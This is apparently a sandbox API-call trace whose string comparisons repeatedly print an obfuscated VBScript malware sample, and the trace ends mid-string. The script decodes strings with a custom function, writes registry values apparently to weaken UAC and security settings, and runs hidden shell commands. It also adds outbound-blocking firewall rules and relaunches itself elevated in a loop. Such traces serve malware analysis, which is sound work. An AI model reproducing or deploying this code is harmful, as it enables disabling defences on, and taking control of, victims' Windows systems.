bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 44 [0222.996] wcsncmp (_String1="\nSet rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned -3 [0222.996] wcsncmp (_String1="Set rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 70 [0222.996] wcsncmp (_String1="et rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 88 [0222.996] wcsncmp (_String1="t rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) then\r\nrule.enabled = false\r\nrules.Remove rule.name\r\nEnd If\r\nNext\r\n\r\nDim newRule\r\nSet newRule = CreateObject(bmw(\"CDJDPENFDDEEOEPCIDHDYDTFEEUEN\"))\r\nnewRule.Name = str1\r\nnewRule.Description = bmw(\"BFAEMEOFAEIBSEXEIFAEIBSCV\") & str1 & \">\"\r\nnewRule.Applicationname = str2\r\nnewRule.Protocol = PROTOCOL_TCP\r\nnewRule.LocalPorts = ALL\r\nnewRule.RemotePorts = ALL\r\nnewRule.Enabled = TRUE\r\nnewRule.Grouping = bmw(\"QDPFDFGFPFCFUEXFJFJEXFNFGCWFBFJFJCUCVDBDCDBDEDE\")\r\nnewRule.Profiles = 2147483647\r\nnewRule.Action = ACTION_BLOCK\r\nnewRule.Direction = NET_FW_RULE_DIR_OUT\r\n\r\nrules.Add newRule\r\nEnd Function\r\n\r\nFunction uac\r\nDim okokCHAVE7\r\nSet okokCHAVE7 = WScript.CreateObject(bmw(\"VESEOFFFUFLFSFWDCEOFKFHFOFO\"))\r\n\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVECEFDSDQECEVEDDQDSDXDYEEDUESEJEFDVEKENDQEIDUESEDFGFAFPFMFQFMFDFRESENFGFLFBFMFUFQESDSFSFPFPFCFLFREMFCFPFQFGFMFLESEGFMFJFGFAFGFCFQESEJFWFQFRFCFKESDUFLEXEYFJFCECELDQ\"), 0, bmw(\"JEBDNDPEODMEGDXEBDM\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDHECEIDODRDFDDDOEIDPDDDFDKDLDQDHEFDVDRDIDWEADDDUDHEFDPESEMFCEYFDEYEPFEEFEAESEXENEYFHFDEFDFFFFCFCEOEXFEDYEOFCFDESEYEXEFDSEYEVESEMESEOFDEFDVFJFDFEEOEWEFDFEYEXFDEOEXFEDSFCEYEWFAFEDEEOEREKFGESEYFCDDENEWESEX\"), 0, bmw(\"DDUDHDJEIDGEADRDUDG\")\r\nokokCHAVE7.RegWrite bmw(\"EDLDODIEDEJDPDSDGDEDPEJDQDEDGDLDMDRDIEGDWDSDJDXEBDEDVDIEGDQETENFDFAFEFAEQFFEGEBETEYEOFAFIFEEGDGFGFDFDEPEYFFEAEPFDFEETFAEYEGDTFAEWETENETEPFEEGDWFKFEFFEPEXEGDTFDFAEXFBFFDSEYDWEPENFGFDEPDHEPFEEVFFFAFB\"), 0, bmw(\"IEADMDOENDLEFDWEADL\")\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDGEBEHDEDWDTDTDGDPDVEHDWDUDGDTEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDKEWFDENFBEWENFDBTDGFHEYEUEXFBENFBEEDFEXFGEWEUEXEJEMEEDEEQENELETDGFHENDUEREPEWEJFDFEFBENFC\"), bmw(\"AEUEV\")\r\nokokCHAVE7.RegWrite bmw(\"QDXEBDUEPEVDSELEIEIDUEEEKEVELEJDUEIESEJFMFDFRFUEXFPFCESEDFGFAFPFMFQFMFDFRESDYFLFRFCFPFLFCFRCIDUFVFNFJFMFPFCFPESDTFMFUFLFJFMEXFBESEIFSFLDYFLFTEXFJFGFBEJFGFEFLEXFRFSFPFCFQ\"), bmw(\"JCRCRCRCRCRCRCRCS\")\r\n\r\nokokCHAVE7.RegWrite bmw(\"CDJDMDNDOEEDUEXEOFDFGEJFBENEEDOERELFBEXFCEXEOFDEEDUENELFEFBERFDFIBTDEENEWFDENFBEEDCEWFDERDXERFBFEFCDFERFCEJEKEUENDPEXFDEREOFI\"), 00000001, bmw(\"LEDDPDREQDOEIEAEDDO\")\r\nokokCHAVE7.RegWrite bmw(\"DDKDNDODPEFDVEYEPFEFHEKFCEOEFDPESEMFCEYFDEYEPFEEFDVEOEMFFFCESFEFJBUDFEOEXFEEOFCEFDXFAENEKFEEOFDDGESFDEKELEVEODQEYFEESEPFJ\"), 00000001, bmw(\"REJDVDXEWDUEOEGEJDU\")\r\nokokCHAVE7.run bmw(\"SFSFCCKFCFOFNFFFIFGCKEPFIFNDVFEFFFEFNFDCKFSFTFAFRFTDOCKFDFIFSFAFBFLFEFD\"),0\r\nokokCHAVE7.run bmw(\"LFGEWFMCDFEFHEUESFEEYFKFHFNFICDDSFHFFEWEGFLEWFKFLCDCSEVEWFEEWFMEWCDDOEEFLDOEBDXFQCTCXCV\"),0\r\n\r\ncriarregra bmw(\"DDGDVFDDGDSDPFICLCPCNCL\"), bmw(\"XEADQFAENFWFTFLFWFFFRCPEDFNFQFJFXFADXETDXEQERCPEQFTFKFYGCFFFWFJFADXGBFFFXFYFAEQFJFYGAFUFAFFGBFFFXFYDEFXFJFYGAFU\")\r\n\r\n\r\nokokCHAVE7.run bmw(\"EENEXEOBVCLEVBVEPENESFABVELBVDBBVBXDGCWEGDYFEEPFDFEEGDTFGEMEWETENEGDRCPDIEREGFGENBX\"),0\r\nokokCHAVE7.run bmw(\"KETFEEUCCCRFCCCFKEYFMFLEUFGFOFFCCCPFJCCCPFLCCCSCCCPEW\"),0\r\n\r\n\r\nEnd Function\r\n\r\n\r\nSet fso = CreateObject(bmw(\"FDXEOFEEUFCFGEUFAESCLDKEUEXEQDXFLFFFGEQEYDTENEVEQEOFG\"))\r\nIf (fso.FileExists(bmw(\"WDYDPEYERFWFIFVFWEYEMFYFFFPFMFGEYEKDIEBFKEYFYFG\"))) = false Then\r\nIf WScript.Arguments.length = 0 Then\r\nDo\r\nIf (fso.FileExists(bmw(\"ODQDHEQEJFOFAFNFOEQEEFQEWFHFEEXEQECDADSFCEQFQEX\"))) = false Then\r\nSet okokCHAVE7 = CreateObject(bmw(\"EDWESEPEWEWCKDEFBFBEWETENELFFETFAEY\"))\r\nokokCHAVE7.ShellExecute bmw(\"TFXFTFDFSFJFQFUDAFFFYFF\"), Chr(34) & _\r\nWScript.ScriptFullName & Chr(34) & \" \"& bmw(\"BFDEIEK\"), \"\", bmw(\"RFQFTFMEYFR\"), 1\r\nWScript.Sleep(600000)\r\nElse\r\nindex = 1001\r\nEnd If\r\nLoop Until index > 1000\r\nelse\r\nuac\r\nindex = 1001\r\nEnd If\r\nEnd If\r\n", _String2="\r\n'' SIG '' Begin signature block", _MaxCount=0x21) returned 103 [0222.996] wcsncmp (_String1=" rules = policy.Rules\r\n\r\nfor each rule in rules\r\nif (InStr(rule.Name, str1)) 